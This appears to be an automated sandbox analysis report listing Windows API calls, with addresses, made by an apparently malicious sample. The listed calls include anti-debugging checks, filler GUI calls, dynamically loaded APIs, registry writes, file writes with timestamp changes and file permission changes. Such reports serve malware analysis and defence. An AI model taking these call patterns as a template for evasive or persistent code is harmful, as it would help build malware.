      • Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A
    • _LcidFromHexString.LIBCMT ref: 0042C7BA
    • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0042C7DA
    • _TestDefaultLanguage.LIBCMT ref: 0042C826
      • Part of subcall function 0042C56A: GetLocaleInfoW.KERNEL32(?,20000001,?,00000002), ref: 0042C58B
      • Part of subcall function 0042C56A: _GetPrimaryLen.LIBCMT ref: 0042C5AC
      • Part of subcall function 0042C56A: _strlen.LIBCMT ref: 0042C5B4
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • __getptd.LIBCMT ref: 0042C7AD
      • Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A
    • _LcidFromHexString.LIBCMT ref: 0042C7BA
    • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0042C7DA
    • _TestDefaultLanguage.LIBCMT ref: 0042C826
      • Part of subcall function 0042C56A: GetLocaleInfoW.KERNEL32(?,20000001,?,00000002), ref: 0042C58B
      • Part of subcall function 0042C56A: _GetPrimaryLen.LIBCMT ref: 0042C5AC
      • Part of subcall function 0042C56A: _strlen.LIBCMT ref: 0042C5B4
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • _strlen.LIBCMT ref: 0042C884
    • _strlen.LIBCMT ref: 0042C897
    • _GetPrimaryLen.LIBCMT ref: 0042C8BA
    • EnumSystemLocalesA.KERNEL32(0042C5C5,00000001,0042C9C6), ref: 0042C8C9
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • IsDebuggerPresent.KERNEL32(?,00000001,00000000), ref: 004225B1
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004225BB
    • UnhandledExceptionFilter.KERNEL32(?), ref: 004225C8
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • __getptd.LIBCMT ref: 0042C4DA
      • Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A
    • _LcidFromHexString.LIBCMT ref: 0042C4E3
    • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0042C506
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • __getptd.LIBCMT ref: 0042C4DA
      • Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A
    • _LcidFromHexString.LIBCMT ref: 0042C4E3
    • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0042C506
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • _strlen.LIBCMT ref: 0042C8EB
    • _GetPrimaryLen.LIBCMT ref: 0042C905
    • EnumSystemLocalesA.KERNEL32(0042C796,00000001,0042C996,00000083,?,000000BC,?,004270F1,?,000000BC,?), ref: 0042C914
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • _strlen.LIBCMT ref: 0042C859
    • EnumSystemLocalesA.KERNEL32(Function_0000D4C3,00000001), ref: 0042C871
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
      • Part of subcall function 0041F3C3: __getptd.LIBCMT ref: 0041F3D6
    • ___ascii_strnicmp.LIBCMT ref: 0042FD2D
      • Part of subcall function 00422D23: __isleadbyte_l.LIBCMT ref: 00422DB8
      • Part of subcall function 00422D23: ___crtLCMapStringA.LIBCMT ref: 00422E05
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_00001446), ref: 0042048D
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,00000001,00000000,00000005), ref: 00408119
    • HeapAlloc.KERNEL32(00000000), ref: 0040811C
    • GetShellWindow.USER32 ref: 00408138
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 00408197
    • HeapAlloc.KERNEL32(00000000), ref: 0040819A
    • CreatePopupMenu.USER32 ref: 004081B6
      • Part of subcall function 004085E0: VirtualAlloc.KERNEL32(00000000,004081EC,00003000,00000004,00000000,00000008,76E6FE8D), ref: 0040861B
      • Part of subcall function 004085E0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,004081EC,00000000), ref: 00408696
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004081FE
    • HeapFree.KERNEL32(00000000), ref: 00408207
    • GetProcessHeap.KERNEL32(00000000,00000008), ref: 0040820C
    • HeapFree.KERNEL32(00000000), ref: 0040820F
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 00408252
    • HeapAlloc.KERNEL32(00000000), ref: 00408255
    • CountClipboardFormats.USER32 ref: 0040826A
    • GetProcessHeap.KERNEL32(00000000,0000000B), ref: 004082B8
    • HeapFree.KERNEL32(00000000), ref: 004082C1
    • GetProcessHeap.KERNEL32(00000000,?), ref: 004082CC
    • HeapFree.KERNEL32(00000000), ref: 004082CF
    • GetProcessHeap.KERNEL32(00000000,00000008), ref: 004082D4
    • HeapFree.KERNEL32(00000000), ref: 004082D7
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 00408317
    • HeapAlloc.KERNEL32(00000000), ref: 0040831A
    • GetMessageExtraInfo.USER32 ref: 0040832F
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040837D
    • HeapFree.KERNEL32(00000000), ref: 00408386
    • GetProcessHeap.KERNEL32(00000000,0000000B), ref: 0040838D
    • GetProcessHeap.KERNEL32(00000008,00000016), ref: 004083D7
    • HeapAlloc.KERNEL32(00000000), ref: 004083DA
    • GetLastError.KERNEL32 ref: 004083EC
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408435
    • HeapFree.KERNEL32(00000000), ref: 0040843E
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408445
    • HeapFree.KERNEL32(00000000), ref: 00408448
    • GetProcessHeap.KERNEL32(00000000,0000000B), ref: 0040844F
    • HeapFree.KERNEL32(00000000), ref: 00408452
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408459
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408460
    • HeapFree.KERNEL32(00000000), ref: 00408469
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408470
    • HeapFree.KERNEL32(00000000), ref: 00408473
    • GetProcessHeap.KERNEL32(00000000,0000000B), ref: 0040847A
    • HeapFree.KERNEL32(00000000), ref: 0040847D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408484
    • HeapFree.KERNEL32(00000000), ref: 00408487
    • GetProcessHeap.KERNEL32(00000000,00000008), ref: 0040848C
    • HeapFree.KERNEL32(00000000), ref: 0040848F
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,?,?,?), ref: 00408C1A
    • HeapAlloc.KERNEL32(00000000), ref: 00408C1D
    • GetShellWindow.USER32 ref: 00408C38
    • GetModuleHandleA.KERNEL32(00000000), ref: 00408C5E
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408C74
    • HeapFree.KERNEL32(00000000), ref: 00408C77
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00408CB0
    • HeapAlloc.KERNEL32(00000000), ref: 00408CB3
    • GetMessagePos.USER32 ref: 00408CD1
      • Part of subcall function 004077D7: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00407861
      • Part of subcall function 004077D7: SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00408D00), ref: 00407876
      • Part of subcall function 004077D7: ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0040788E
      • Part of subcall function 004077D7: CloseHandle.KERNEL32(00000000), ref: 004078A7
      • Part of subcall function 004077D7: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000001,?,?,?,?,00408D00), ref: 004078C0
      • Part of subcall function 004077D7: HeapFree.KERNEL32(00000000), ref: 004078C7
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408D1C
    • HeapFree.KERNEL32(00000000), ref: 00408D25
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408D2A
    • HeapFree.KERNEL32(00000000), ref: 00408D2D
    • GetProcessHeap.KERNEL32(00000008,00000018), ref: 00408D70
    • HeapAlloc.KERNEL32(00000000), ref: 00408D73
    • GetCaretBlinkTime.USER32 ref: 00408D8A
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408DDA
    • HeapFree.KERNEL32(00000000), ref: 00408DE3
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408DEE
    • HeapFree.KERNEL32(00000000), ref: 00408DF1
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408DF6
    • HeapFree.KERNEL32(00000000), ref: 00408DF9
    • GetProcessHeap.KERNEL32(00000008,00000018), ref: 00408E3E
    • HeapAlloc.KERNEL32(00000000), ref: 00408E41
    • GetCapture.USER32 ref: 00408E55
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408EA0
    • HeapFree.KERNEL32(00000000), ref: 00408EA9
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408EB0
    • HeapFree.KERNEL32(00000000), ref: 00408EB3
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408EBA
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408EC5
    • HeapFree.KERNEL32(00000000), ref: 00408ECE
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408ED5
    • HeapFree.KERNEL32(00000000), ref: 00408ED8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408EDF
    • HeapFree.KERNEL32(00000000), ref: 00408EE2
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00408EE7
    • HeapFree.KERNEL32(00000000), ref: 00408EEA
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000003D,00000000,76E6FE8D,00000000), ref: 00401176
    • HeapAlloc.KERNEL32(00000000), ref: 00401179
    • CountClipboardFormats.USER32 ref: 0040119F
    • GetProcessHeap.KERNEL32(00000008,000000C1), ref: 004012C8
    • HeapAlloc.KERNEL32(00000000), ref: 004012CB
    • GetDialogBaseUnits.USER32 ref: 004012EA
      • Part of subcall function 004038F7: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,0040131B,00000000,0040131B,00000000,00000001,?,0040131B,00020006), ref: 00403929
      • Part of subcall function 004038F7: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,0040131B,0040131B,?,0040131B,00020006), ref: 0040393C
    • GetProcessHeap.KERNEL32(00000008,00000019,00020006), ref: 00401356
    • HeapAlloc.KERNEL32(00000000), ref: 00401359
    • GetDialogBaseUnits.USER32 ref: 00401372
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 004013C4
    • HeapAlloc.KERNEL32(00000000), ref: 004013C7
    • GetCurrentThreadId.KERNEL32 ref: 004013E0
    • GetProcessHeap.KERNEL32(00000008,00000025), ref: 0040143F
    • HeapAlloc.KERNEL32(00000000), ref: 00401442
    • ReleaseCapture.USER32 ref: 00401458
    • RegSetValueExW.ADVAPI32(00000006,?,00000000,00000004,00000001,00000004), ref: 0040149A
    • RegSetValueExW.ADVAPI32(00000006,774C5173,00000000,00000001,?,?), ref: 004014CE
    • RegSetValueExW.ADVAPI32(00000006,00000000,00000000,00000001,?,?), ref: 00401500
    • RegCloseKey.ADVAPI32(00000006), ref: 00401505
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401515
    • HeapFree.KERNEL32(00000000), ref: 0040151E
    • GetProcessHeap.KERNEL32(00000000,774C5173), ref: 00401524
    • HeapFree.KERNEL32(00000000), ref: 00401527
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040152D
    • HeapFree.KERNEL32(00000000), ref: 00401530
    • GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00401542
    • HeapFree.KERNEL32(00000000), ref: 0040154B
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00401551
    • HeapFree.KERNEL32(00000000), ref: 00401554
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,001CFDA8), ref: 00404237
    • HeapAlloc.KERNEL32(00000000), ref: 0040423A
    • GetShellWindow.USER32 ref: 00404255
    • GetProcessHeap.KERNEL32(00000008,0000000F), ref: 004042AC
    • HeapAlloc.KERNEL32(00000000), ref: 004042AF
    • GetDoubleClickTime.USER32 ref: 004042CD
    • LoadLibraryA.KERNEL32(?), ref: 004042F7
    • GetProcAddress.KERNEL32(00000000), ref: 004042FE
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 00404376
    • HeapAlloc.KERNEL32(00000000), ref: 00404379
    • GetDialogBaseUnits.USER32 ref: 00404390
    • LoadLibraryA.KERNEL32(?), ref: 004043BA
    • GetProcAddress.KERNEL32(00000000), ref: 004043C1
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 00404419
    • HeapAlloc.KERNEL32(00000000), ref: 0040441C
    • CloseClipboard.USER32 ref: 00404433
    • LoadLibraryA.KERNEL32(?), ref: 0040445D
    • GetProcAddress.KERNEL32(00000000), ref: 00404464
    • GetProcessHeap.KERNEL32(00000008,00401A39), ref: 00404487
    • HeapAlloc.KERNEL32(00000000), ref: 0040448A
    • GetProcessHeap.KERNEL32(00000000,00000005), ref: 004044C8
    • HeapFree.KERNEL32(00000000), ref: 004044CB
    • CloseHandle.KERNEL32(?), ref: 004044D4
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004044DD
    • HeapFree.KERNEL32(00000000), ref: 004044E0
    • CloseHandle.KERNEL32(?), ref: 004044EC
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004044F5
    • HeapFree.KERNEL32(00000000), ref: 004044F8
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404504
    • HeapFree.KERNEL32(00000000), ref: 0040450D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00404512
    • HeapFree.KERNEL32(00000000), ref: 00404515
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,?,?,?), ref: 00408F71
    • HeapAlloc.KERNEL32(00000000), ref: 00408F74
    • GetShellWindow.USER32 ref: 00408F8F
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00408FE5
    • HeapAlloc.KERNEL32(00000000), ref: 00408FE8
    • GetMessagePos.USER32 ref: 00409006
      • Part of subcall function 004085E0: VirtualAlloc.KERNEL32(00000000,004081EC,00003000,00000004,00000000,00000008,76E6FE8D), ref: 0040861B
      • Part of subcall function 004085E0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,004081EC,00000000), ref: 00408696
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409052
    • HeapFree.KERNEL32(00000000), ref: 0040905B
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00409060
    • HeapFree.KERNEL32(00000000), ref: 00409063
    • GetProcessHeap.KERNEL32(00000008,00000018), ref: 004090A9
    • HeapAlloc.KERNEL32(00000000), ref: 004090AC
    • GetCaretBlinkTime.USER32 ref: 004090C3
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00409114
    • HeapFree.KERNEL32(00000000), ref: 0040911D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00409128
    • HeapFree.KERNEL32(00000000), ref: 0040912B
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00409130
    • HeapFree.KERNEL32(00000000), ref: 00409133
    • GetProcessHeap.KERNEL32(00000008,00000018), ref: 00409178
    • HeapAlloc.KERNEL32(00000000), ref: 0040917B
    • GetCapture.USER32 ref: 0040918F
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004091DB
    • HeapFree.KERNEL32(00000000), ref: 004091E4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 004091EB
    • HeapFree.KERNEL32(00000000), ref: 004091EE
    • GetProcessHeap.KERNEL32(00000000,?), ref: 004091F5
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409200
    • HeapFree.KERNEL32(00000000), ref: 00409209
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00409210
    • HeapFree.KERNEL32(00000000), ref: 00409213
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040921A
    • HeapFree.KERNEL32(00000000), ref: 0040921D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00409222
    • HeapFree.KERNEL32(00000000), ref: 00409225
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000208,7142434B), ref: 004016C4
    • HeapAlloc.KERNEL32(00000000), ref: 004016C7
      • Part of subcall function 0040E684: GetModuleHandleA.KERNEL32(?,?), ref: 0040E6BD
      • Part of subcall function 0040E684: GetProcAddress.KERNEL32(00000000), ref: 0040E6C4
    • GetProcessHeap.KERNEL32(00000008,0000009D), ref: 004017AA
    • HeapAlloc.KERNEL32(00000000), ref: 004017AD
    • GetActiveWindow.USER32 ref: 004017C1
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 004017F0
    • GetProcessHeap.KERNEL32(00000008,00000039), ref: 00401836
    • HeapAlloc.KERNEL32(00000000), ref: 0040183D
    • GetCaretBlinkTime.USER32 ref: 00401854
    • StrStrIW.SHLWAPI(?,00000000), ref: 0040187E
    • GetProcessHeap.KERNEL32(00000008,00000051), ref: 004018ED
    • HeapAlloc.KERNEL32(00000000), ref: 004018F4
    • GetModuleHandleW.KERNEL32(00000000), ref: 0040190A
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 00401939
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401942
    • HeapFree.KERNEL32(00000000), ref: 00401949
    • StrCatW.SHLWAPI(?), ref: 0040195C
      • Part of subcall function 0040DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0040DD37
      • Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD44
      • Part of subcall function 0040DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040DD6B
      • Part of subcall function 0040DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00401970,?), ref: 0040DD76
      • Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD80
      • Part of subcall function 0040DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00401970,?), ref: 0040DD95
      • Part of subcall function 0040DD0B: CloseHandle.KERNEL32(00000000), ref: 0040DD9C
      • Part of subcall function 0040DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401970,?), ref: 0040DDA9
      • Part of subcall function 0040DD0B: HeapFree.KERNEL32(00000000), ref: 0040DDB0
    • HeapFree.KERNEL32(00000000), ref: 004019BB
      • Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000008,00000015,00000000,?,?), ref: 00408799
      • Part of subcall function 00408761: HeapAlloc.KERNEL32(00000000), ref: 0040879C
      • Part of subcall function 00408761: GetTickCount.KERNEL32 ref: 004087B8
      • Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00408804
      • Part of subcall function 00408761: HeapAlloc.KERNEL32(00000000), ref: 00408807
      • Part of subcall function 00408761: GetCapture.USER32 ref: 00408819
      • Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0040886A
      • Part of subcall function 00408761: HeapAlloc.KERNEL32(00000000), ref: 00408871
      • Part of subcall function 00408761: GetCursor.USER32 ref: 00408885
      • Part of subcall function 00408761: LoadLibraryA.KERNEL32(66713859), ref: 004088B6
      • Part of subcall function 00408761: GetProcAddress.KERNEL32(00000000), ref: 004088BD
      • Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004088DF
      • Part of subcall function 00408761: HeapFree.KERNEL32(00000000), ref: 004088EC
      • Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000000,66713859), ref: 004088F7
      • Part of subcall function 00408761: HeapFree.KERNEL32(00000000), ref: 004088FA
      • Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000000,?), ref: 00408901
      • Part of subcall function 00408761: HeapFree.KERNEL32(00000000), ref: 00408904
      • Part of subcall function 0040D8BA: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0040D8EA
      • Part of subcall function 0040D8BA: SetEntriesInAclW.ADVAPI32(00000001,000000FF,00000000,?), ref: 0040D920
      • Part of subcall function 0040D8BA: LocalAlloc.KERNEL32(00000040,00000014), ref: 0040D92A
      • Part of subcall function 0040D8BA: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0040D934
      • Part of subcall function 0040D8BA: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 0040D941
      • Part of subcall function 0040D8BA: SetFileSecurityW.ADVAPI32(?,00000004,00000000), ref: 0040D94B
      • Part of subcall function 0040D8BA: FreeSid.ADVAPI32(00000000), ref: 0040D95A
      • Part of subcall function 0040D8BA: LocalFree.KERNEL32(00000000), ref: 0040D96F
      • Part of subcall function 0040D8BA: LocalFree.KERNEL32(00000000), ref: 0040D976
      • Part of subcall function 00401560: StrDupW.SHLWAPI(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401992), ref: 0040158B
      • Part of subcall function 00401560: GetProcessHeap.KERNEL32(00000008,00000015), ref: 004015D6
      • Part of subcall function 00401560: HeapAlloc.KERNEL32(00000000), ref: 004015D9
      • Part of subcall function 00401560: GetClipboardViewer.USER32 ref: 004015E8
      • Part of subcall function 00401560: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401639
      • Part of subcall function 00401560: HeapFree.KERNEL32(00000000), ref: 0040163C
      • Part of subcall function 00401560: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00401992), ref: 0040166C
      • Part of subcall function 00401560: HeapFree.KERNEL32(00000000), ref: 0040166F
